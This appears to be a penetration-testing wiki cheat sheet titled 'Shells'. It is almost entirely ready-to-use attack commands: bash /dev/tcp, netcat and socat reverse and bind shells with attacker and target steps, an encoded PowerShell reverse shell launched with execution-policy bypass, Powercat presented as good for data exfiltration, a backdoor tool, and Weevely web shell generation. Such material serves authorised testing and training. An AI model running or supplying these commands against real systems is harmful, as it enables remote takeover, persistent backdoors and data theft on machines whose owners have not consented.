Shells

From pentestwiki.org

Classic methods

bash

Bash reverse shell:

On attacker:

$nc -nvv -lp 8080


On target:

$bash -i >& /dev/tcp/$IP/8080 0>&1


netcat

  • netcat bindshell

On target:

$nc -nvvlp 8989 -e /bin/bash


On attacker:

$nc -nvv $IP 8989


  • netcat reverse shell:

On attacker:

$nc -nvvlp 8989 $IP


On target:

$nc -nvv $IP 8989 -e /bin/bash


  • To improve the shell (Method 1) @JFaust0 :
Ctrl^Z
stty raw -echo
fg
reset
  • To improve interactive shell (Method 2):
$python -c ‘import pty; pty.spawn("/bin/bash")’


socat

Syntax:

$socat [options] address1 address2

Examples of address:

  • -
  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
  • TUN:192.168.1.2/24,iff-up=1



  • Socat bindshell

On target:

$socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane


On attacker:

$socat FILE:`tty`,raw,echo=0 TCP:$IP:1337


  • Socat reverse shell

On attacker:

$socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0


On target:

$socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane


  • Build a VPN with socat:

On server:

root #socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1


On client:

root #socat tcp:50500 TUN:192.168.10.3/24,iff-up=1


Windows Powershell

PS>$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS>$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS>echo "powershell -ep bypass -nop -encodedcommand $b" | clip


Then directly paste (Ctrl+V) in the target terminal.

USB man-in-the-middle

  • proxy USB over IP

Remote:

$socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr

Local:

$socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:<target>:1337


tsh

Tiny SHell is an open-source UNIX backdoor (C language)

Powershell modules

Powercat

netcat functionality with powershell. No packages required. Good for data exfiltration.

In target:

C:>powershell -exec bypass
PS>Import-Module .\powercat.ps1
PS>powercat -l 80 -i input.txt -c $IP


In attacker machine:

$nc -vvlp 80 > input.txt


Reference: https://github.com/besimorhino/powercat

Webshells

Weevely

$python weevely.py generate AbC /var/www/html/AbC.txt